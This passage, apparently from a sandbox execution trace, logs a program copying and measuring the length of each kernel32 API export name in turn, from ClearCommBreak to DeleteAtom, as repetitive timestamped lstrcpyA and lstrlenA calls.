returned="ClearCommBreak" [0076.949] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0076.949] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0076.949] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0076.949] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0076.949] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0076.949] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0076.949] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0076.949] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0076.949] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0076.949] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0076.949] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0076.949] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0076.949] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0076.949] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0076.950] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0076.950] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0076.950] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0076.950] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0076.950] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0076.950] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0076.950] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0076.950] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0076.950] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0076.950] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0076.950] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0076.950] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0076.950] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0076.950] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0076.950] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0076.950] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0076.950] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0076.950] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0076.950] lstrlenA (lpString="COPYCONTEXT") returned 11 [0076.950] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0076.951] lstrlenA (lpString="COPYFILEA") returned 9 [0076.951] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0076.951] lstrlenA (lpString="COPYFILEEXA") returned 11 [0076.951] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0076.951] lstrlenA (lpString="COPYFILEEXW") returned 11 [0076.951] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0076.951] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0076.951] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0076.951] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0076.951] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0076.951] lstrlenA (lpString="COPYFILEW") returned 9 [0076.951] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0076.951] lstrlenA (lpString="COPYLZFILE") returned 10 [0076.951] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0076.951] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0076.951] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0076.951] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0076.951] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0076.951] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0076.952] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0076.952] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0076.952] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0076.952] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0076.952] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0076.952] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0076.952] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0076.952] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0076.952] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0076.952] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0076.952] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0076.952] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0076.952] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0076.952] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0076.952] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0076.952] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0076.952] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0076.952] lstrlenA (lpString="CREATEEVENTA") returned 12 [0076.952] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0076.952] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0076.952] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0076.952] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0076.952] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0076.952] lstrlenA (lpString="CREATEEVENTW") returned 12 [0076.952] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0076.952] lstrlenA (lpString="CREATEFIBER") returned 11 [0076.952] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0076.952] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0076.953] lstrlenA (lpString="CREATEFILEA") returned 11 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0076.953] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0076.953] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0076.953] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0076.953] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0076.953] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0076.953] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0076.953] lstrlenA (lpString="CREATEFILEW") returned 11 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0076.953] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0076.953] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0076.953] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0076.953] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0076.953] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0076.953] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0076.953] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0076.953] lstrlenA (lpString="CREATEJOBSET") returned 12 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0076.953] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0076.953] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0076.953] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0076.954] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0076.954] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0076.954] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0076.954] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0076.954] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0076.954] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0076.954] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0076.954] lstrlenA (lpString="CREATEPIPE") returned 10 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0076.954] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0076.954] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0076.954] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0076.954] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0076.954] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0076.954] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0076.954] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0076.954] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0076.954] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0076.954] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0076.954] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0076.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0076.954] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0076.955] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0076.955] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0076.955] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0076.955] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0076.955] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0076.955] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0076.955] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0076.955] lstrlenA (lpString="CREATETHREAD") returned 12 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0076.955] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0076.955] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0076.955] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0076.955] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0076.955] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0076.955] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0076.955] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0076.955] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0076.955] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0076.955] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0076.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0076.955] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0076.956] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0076.956] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0076.956] lstrlenA (lpString="CTRLROUTINE") returned 11 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0076.956] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0076.956] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0076.956] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0076.956] lstrlenA (lpString="DEBUGBREAK") returned 10 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0076.956] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0076.956] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0076.956] lstrlenA (lpString="DECODEPOINTER") returned 13 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0076.956] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0076.956] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0076.956] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0076.956] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0076.956] lstrlenA 